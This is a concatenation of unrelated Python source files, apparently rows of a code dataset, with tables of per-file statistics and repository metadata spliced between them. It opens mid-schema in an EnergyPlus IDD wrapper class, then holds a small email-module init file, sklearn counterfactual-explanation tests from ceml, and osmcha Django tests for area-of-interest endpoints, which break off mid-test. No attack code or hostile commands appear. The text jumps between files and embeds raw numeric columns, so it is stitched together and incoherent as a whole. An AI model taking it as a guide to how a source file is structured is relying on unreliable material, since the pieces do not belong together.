'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'file name',
{'name': u'File Name',
'pyname': u'file_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'Construction:WindowDataFile',
'pyname': u'ConstructionWindowDataFile',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def file_name(self):
"""field `File Name`
| default file name is "Window5DataFile.dat"
| limit on this field is 100 characters.
Args:
value (str): value for IDD Field `File Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `file_name` or None if not set
"""
return self["File Name"]
@file_name.setter
def file_name(self, value=None):
"""Corresponds to IDD field `File Name`"""
self["File Name"] = value
class MaterialPropertyGlazingSpectralData(DataObject):
""" Corresponds to IDD object `MaterialProperty:GlazingSpectralData`
Name is followed by up to 800 sets of normal-incidence measured values of
[wavelength, transmittance, front reflectance, back reflectance] for wavelengths
covering the solar spectrum (from about 0.25 to 2.5 microns)
"""
_schema = {'extensible-fields': OrderedDict([(u'wavelength',
{'name': u'Wavelength',
'pyname': u'wavelength',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'micron'}),
(u'transmittance',
{'name': u'Transmittance',
'pyname': u'transmittance',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real'}),
(u'front reflectance',
{'name': u'Front Reflectance',
'pyname': u'front_reflectance',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real'}),
(u'back reflectance',
{'name': u'Back Reflectance',
'pyname': u'back_reflectance',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real'})]),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'})]),
'format': u'spectral',
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:GlazingSpectralData',
'pyname': u'MaterialPropertyGlazingSpectralData',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
def add_extensible(self,
wavelength=None,
transmittance=None,
front_reflectance=None,
back_reflectance=None,
):
"""Add values for extensible fields.
Args:
wavelength (float): value for IDD Field `Wavelength`
Units: micron
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
transmittance (float): value for IDD Field `Transmittance`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
front_reflectance (float): value for IDD Field `Front Reflectance`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
back_reflectance (float): value for IDD Field `Back Reflectance`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
"""
vals = []
wavelength = self.check_value("Wavelength", wavelength)
vals.append(wavelength)
transmittance = self.check_value("Transmittance", transmittance)
vals.append(transmittance)
front_reflectance = self.check_value(
"Front Reflectance",
front_reflectance)
vals.append(front_reflectance)
back_reflectance = self.check_value(
"Back Reflectance",
back_reflectance)
vals.append(back_reflectance)
self._extdata.append(vals)
@property
def extensibles(self):
"""Get list of all extensibles."""
return self._extdata
@extensibles.setter
def extensibles(self, extensibles):
"""Replaces extensible fields with `extensibles`
Args:
extensibles (list): nested list of extensible values
"""
self._extdata = []
for ext in extensibles:
self.add_extensible(*ext)
| 39.35321
| 123
| 0.465598
| 84,635
| 957,621
| 5.165558
| 0.009783
| 0.025911
| 0.027338
| 0.026021
| 0.93339
| 0.908751
| 0.885166
| 0.84938
| 0.797972
| 0.762333
| 0
| 0.019434
| 0.45268
| 957,621
| 24,333
| 124
| 39.354827
| 0.814693
| 0.274628
| 0
| 0.758085
| 0
| 0
| 0.235793
| 0.023689
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126496
| false
| 0
| 0.000268
| 0
| 0.197427
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
837b7a81a53a0003f20450258ded9fb2526e5fb8
| 191
|
py
|
Python
|
h/emails/__init__.py
|
julien-cheng/h
|
36c8ec044725720cf36f0986cdf025395aca8929
|
[
"BSD-2-Clause"
] | 2
|
2019-08-04T07:22:11.000Z
|
2020-07-17T05:01:41.000Z
|
h/emails/__init__.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | 4
|
2020-03-24T17:38:24.000Z
|
2022-03-02T05:45:01.000Z
|
h/emails/__init__.py
|
fuelpress/i.fuel.press
|
af7b25895d813af0fef656dcf483afe852a99d76
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from h.emails import reply_notification, reset_password, signup
__all__ = ("reply_notification", "reset_password", "signup")
| 27.285714
| 63
| 0.764398
| 23
| 191
| 5.782609
| 0.695652
| 0.255639
| 0.330827
| 0.451128
| 0.541353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005917
| 0.115183
| 191
| 6
| 64
| 31.833333
| 0.781065
| 0.109948
| 0
| 0
| 0
| 0
| 0.22619
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.666667
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
83b81815e11248e412710ea10679ce9c9c0705ab
| 17,311
|
py
|
Python
|
tests/sklearn/test_sklearn_pipeline.py
|
andreArtelt/ceml
|
364d4630d6a01592c2ab86f2d53dbb7feb682381
|
[
"MIT"
] | 24
|
2019-07-12T08:11:25.000Z
|
2021-12-09T19:24:53.000Z
|
tests/sklearn/test_sklearn_pipeline.py
|
andreArtelt/ceml
|
364d4630d6a01592c2ab86f2d53dbb7feb682381
|
[
"MIT"
] | 6
|
2020-09-28T04:42:44.000Z
|
2021-09-27T06:59:36.000Z
|
tests/sklearn/test_sklearn_pipeline.py
|
andreArtelt/ceml
|
364d4630d6a01592c2ab86f2d53dbb7feb682381
|
[
"MIT"
] | 7
|
2019-09-11T13:54:57.000Z
|
2021-01-14T13:13:26.000Z
|
# -*- coding: utf-8 -*-
import sys
sys.path.insert(0,'..')
import numpy as np
np.random.seed(42)
import sklearn
from sklearn.datasets import load_iris, load_boston
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.preprocessing import StandardScaler, RobustScaler, PolynomialFeatures, Normalizer, MinMaxScaler, MaxAbsScaler
from sklearn.decomposition import PCA
from sklearn.pipeline import make_pipeline
from ceml.sklearn import generate_counterfactual
def compute_counterfactuals(model, x, y):
features_whitelist = None
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="bfgs", return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
features_whitelist = [1, 2]
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
features_whitelist = [0, 1, 2]
x_cf, y_cf, delta = generate_counterfactual(model, x, 0, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, 0, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
def compute_counterfactuals_poly(model, x, y):
features_whitelist = None
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
features_whitelist = [0, 1, 2]
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=1.0, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, 0, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
def compute_counterfactuals_2(model, x, y):
features_whitelist = None
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="powell", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=0.001, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=0.001, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l1", C=0.001, optimizer="powell", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
features_whitelist = [0, 1, 2]
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization=None, optimizer="powell", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l2", C=0.001, optimizer="bfgs", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l2", C=0.001, optimizer="nelder-mead", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
x_cf, y_cf, delta = generate_counterfactual(model, x, y, features_whitelist=features_whitelist, regularization="l2", C=0.001, optimizer="powell", return_as_dict=False)
assert y_cf == y
assert model.predict(np.array([x_cf])) == y
assert all([True if i in features_whitelist else delta[i] == 0. for i in range(x.shape[0])])
def test_pipeline_scaler_softmaxregression():
# Load data
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
scaler = StandardScaler()
pca = PCA(n_components=2)
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(scaler, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
assert model.predict([x_orig]) == 2
# Compute counterfactual
compute_counterfactuals(model, x_orig, 0)
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=None, optimizer="mp", regularization=None, return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=None, optimizer="mp", regularization="l1", return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
features_whitelist = [0, 1, 2]
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=features_whitelist, optimizer="mp", regularization=None, return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=features_whitelist, optimizer="mp", regularization="l1", return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
# More than one preprocessing
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(pca, scaler, model)
model.fit(X_train, y_train)
assert model.predict([x_orig]) == 2
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=None, optimizer="mp", regularization=None, return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=None, optimizer="mp", regularization="l1", return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
def test_pipeline_robustscaler_softmaxregression():
# Load data
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
scaler = RobustScaler()
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(scaler, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
assert model.predict([x_orig]) == 2
# Compute counterfactual
compute_counterfactuals(model, x_orig, 0)
def test_pipeline_maxabsscaler_softmaxregression():
# Load data
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
scaler = MaxAbsScaler()
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(scaler, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
assert model.predict([x_orig]) == 2
# Compute counterfactual
compute_counterfactuals_2(model, x_orig, 0)
def test_pipeline_minmaxscaler_softmaxregression():
# Load data
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
scaler = MinMaxScaler()
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(scaler, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
assert model.predict([x_orig]) == 2
# Compute counterfactual
compute_counterfactuals_2(model, x_orig, 0)
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=None, optimizer="mp", regularization=None, return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=None, optimizer="mp", regularization="l1", return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
features_whitelist = [0, 1, 2]
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=features_whitelist, optimizer="mp", regularization=None, return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
x_cf, y_cf, delta = generate_counterfactual(model, x_orig, 0, features_whitelist=features_whitelist, optimizer="mp", regularization="l1", return_as_dict=False)
assert y_cf == 0
assert model.predict(np.array([x_cf])) == 0
def test_pipeline_normalizer_softmaxregression():
# Load data
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
scaler = Normalizer()
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(scaler, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
assert model.predict([x_orig]) == 2
# Compute counterfactual
compute_counterfactuals_2(model, x_orig, 0)
def test_pipeline_poly_softmaxregression():
# Load data
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
poly = PolynomialFeatures(degree=2)
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(poly, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
assert model.predict([x_orig]) == 2
# Compute counterfactual
compute_counterfactuals_poly(model, x_orig, 0)
def test_pipeline_scaler_poly_softmaxregression():
# Load data
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
poly = PolynomialFeatures(degree=2)
scaler = StandardScaler()
model = LogisticRegression(solver='lbfgs', multi_class='multinomial')
model = make_pipeline(poly, scaler, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
assert model.predict([x_orig]) == 2
# Compute counterfactual
compute_counterfactuals_poly(model, x_orig, 0)
def test_pipeline_pca_linearregression():
# Load data
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=4242)
# Create and fit model
pca = PCA(n_components=4)
model = Lasso()
model = make_pipeline(pca, model)
model.fit(X_train, y_train)
# Select data point for explaining its prediction
x_orig = X_test[1:4][0,:]
y_orig_pred = model.predict([x_orig])
assert y_orig_pred >= 25 and y_orig_pred < 26
# Compute counterfactual
y_target = 20.
y_target_done = lambda z: np.abs(z - y_target) < 3.
x_cf, y_cf, _ = generate_counterfactual(model, x_orig, y_target=y_target, done=y_target_done, regularization="l1", C=0.1, features_whitelist=None, optimizer="bfgs", return_as_dict=False)
assert y_target_done(y_cf)
assert y_target_done(model.predict(np.array([x_cf])))
x_cf, y_cf, _ = generate_counterfactual(model, x_orig, y_target=y_target, done=y_target_done, regularization="l1", features_whitelist=None, optimizer="mp", return_as_dict=False)
assert y_target_done(y_cf)
assert y_target_done(model.predict(np.array([x_cf])))
x_cf, y_cf, _ = generate_counterfactual(model, x_orig, y_target=y_target, done=y_target_done, regularization="l2", features_whitelist=None, optimizer="mp", return_as_dict=False)
assert y_target_done(y_cf)
assert y_target_done(model.predict(np.array([x_cf])))
| 44.048346
| 190
| 0.718965
| 2,638
| 17,311
| 4.47536
| 0.045489
| 0.138235
| 0.023378
| 0.020837
| 0.928511
| 0.924869
| 0.922921
| 0.92165
| 0.919024
| 0.917584
| 0
| 0.017633
| 0.15805
| 17,311
| 393
| 191
| 44.048346
| 0.792384
| 0.049968
| 0
| 0.799197
| 0
| 0
| 0.024738
| 0
| 0
| 0
| 0
| 0
| 0.421687
| 1
| 0.044177
| false
| 0
| 0.040161
| 0
| 0.084337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83e8c136c9d627a3bae41144773ed353456666ed
| 42,284
|
py
|
Python
|
osmchadjango/supervise/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/supervise/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
osmchadjango/supervise/tests/test_views.py
|
tordans/osmcha-django
|
21456989abec20c9c65a91c57cc9da8661121e6a
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import xml.etree.ElementTree as ET
from django.urls import reverse
from django.contrib.gis.geos import MultiPolygon, Polygon, Point, LineString
from rest_framework.test import APITestCase
from social_django.models import UserSocialAuth
from ...changeset.tests.modelfactories import (
ChangesetFactory, HarmfulChangesetFactory, GoodChangesetFactory,
SuspicionReasonsFactory, TagFactory, UserWhitelistFactory
)
from ...users.models import User
from ..models import AreaOfInterest, BlacklistedUser
class TestAoIListView(APITestCase):
def setUp(self):
self.m_polygon = MultiPolygon(
Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
)
self.m_polygon_2 = MultiPolygon(
Polygon(((30, 30), (30, 31), (31, 31), (30, 30))),
Polygon(((31, 31), (31, 32), (32, 32), (31, 31)))
)
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.user_2 = User.objects.create_user(
username='test',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user_2,
provider='openstreetmap',
uid='42344',
)
self.area = AreaOfInterest.objects.create(
name='Best place in the world',
user=self.user,
geometry=self.m_polygon,
filters={
'editor': 'Potlatch 2',
'harmful': 'False',
'geometry': self.m_polygon.geojson
},
)
self.area_2 = AreaOfInterest.objects.create(
name='Another AOI',
user=self.user,
filters={'geometry': self.m_polygon_2.geojson},
geometry=self.m_polygon_2
)
self.area_3 = AreaOfInterest.objects.create(
user=self.user_2,
name='Harmful edits',
filters={'harmful': 'False'},
)
self.url = reverse('supervise:aoi-list-create')
def test_list_view_unauthenticated(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 401)
def test_list_view(self):
self.client.login(username=self.user.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.get('results').get('features')), 2)
def test_ordering(self):
self.client.login(username=self.user.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
# test default ordering is -date
self.assertEqual(
response.data.get('results').get('features')[0]['properties']['name'],
'Another AOI'
)
# test ordering by date
response = self.client.get(self.url, {'order_by': 'date'})
self.assertEqual(
response.data.get('results').get('features')[0]['properties']['name'],
'Best place in the world'
)
# test ordering by name
response = self.client.get(self.url, {'order_by': '-name'})
self.assertEqual(
response.data.get('results').get('features')[0]['properties']['name'],
'Best place in the world'
)
def test_list_view_with_user_2(self):
self.client.login(username=self.user_2.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.get('results').get('features')), 1)
self.assertEqual(
response.data.get('results')['features'][0]['properties']['name'],
'Harmful edits'
)
self.assertEqual(
response.data.get('results')['features'][0]['properties']['filters'],
{'harmful': 'False'}
)
class TestAoICreateView(APITestCase):
def setUp(self):
self.polygon = Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.url = reverse('supervise:aoi-list-create')
self.data = {
'name': 'Golfo da Guiné',
'filters': {
'is_suspect': 'True',
'geometry': self.polygon.geojson
},
}
self.data_bbox = {
'name': 'Golfo da Guiné',
'filters': {
'is_suspect': 'True',
'in_bbox': '2,0,5,2'
},
}
self.without_geo_aoi = {
'name': 'Unchecked suspect changesets',
'filters': {
'is_suspect': 'True',
'checked': 'False'
},
}
def test_create_AOI_unauthenticated(self):
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 401)
self.assertEqual(AreaOfInterest.objects.count(), 0)
def test_create_AOI(self):
self.client.login(username=self.user.username, password='password')
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 201)
self.assertEqual(AreaOfInterest.objects.count(), 1)
aoi = AreaOfInterest.objects.get(name='Golfo da Guiné')
self.assertEqual(aoi.user, self.user)
self.assertEqual(aoi.filters, self.data.get('filters'))
self.assertIsInstance(aoi.geometry, Polygon)
self.assertTrue(
aoi.geometry.intersects(
Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
)
)
def test_create_without_geometry_and_bbox(self):
self.client.login(username=self.user.username, password='password')
response = self.client.post(self.url, self.without_geo_aoi)
self.assertEqual(response.status_code, 201)
self.assertEqual(AreaOfInterest.objects.count(), 1)
aoi = AreaOfInterest.objects.get(name='Unchecked suspect changesets')
self.assertEqual(aoi.user, self.user)
self.assertEqual(aoi.filters, self.without_geo_aoi.get('filters'))
def test_create_with_bbox(self):
self.client.login(username=self.user.username, password='password')
response = self.client.post(self.url, self.data_bbox)
self.assertEqual(response.status_code, 201)
self.assertEqual(AreaOfInterest.objects.count(), 1)
aoi = AreaOfInterest.objects.get(name='Golfo da Guiné')
self.assertEqual(aoi.user, self.user)
self.assertEqual(aoi.filters, self.data_bbox.get('filters'))
self.assertIsInstance(aoi.geometry, Polygon)
self.assertTrue(
aoi.geometry.intersects(
Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
)
)
def test_validation(self):
self.client.login(username=self.user.username, password='password')
response = self.client.post(self.url, {'name': 'Empty AoI'})
self.assertEqual(response.status_code, 400)
self.assertEqual(AreaOfInterest.objects.count(), 0)
# test validation of unique name of AoI for each user
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 201)
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 400)
def test_auto_user_field(self):
user_2 = User.objects.create_user(
username='test',
email='c@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=user_2,
provider='openstreetmap',
uid='4444',
)
self.client.login(username=self.user.username, password='password')
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 201)
aoi = AreaOfInterest.objects.get(name='Golfo da Guiné')
self.assertEqual(aoi.user, self.user)
class TestAoIDetailAPIViews(APITestCase):
def setUp(self):
self.m_polygon = MultiPolygon(
Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
)
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.aoi = AreaOfInterest.objects.create(
name='Best place in the world',
user=self.user,
geometry=self.m_polygon,
filters={
'editor': 'Potlatch 2',
'harmful': 'False',
'users': 'test',
'uids': '234,43',
'checked_by': 'qa_user',
'geometry': self.m_polygon.geojson
},
)
self.m_polygon_2 = MultiPolygon(
Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
)
self.data = {
'filters': {
'is_suspect': 'True',
'geometry': self.m_polygon_2.geojson,
},
'name': 'Golfo da Guiné'
}
def test_unauthenticated(self):
response = self.client.get(
reverse('supervise:aoi-detail', args=[self.aoi.pk])
)
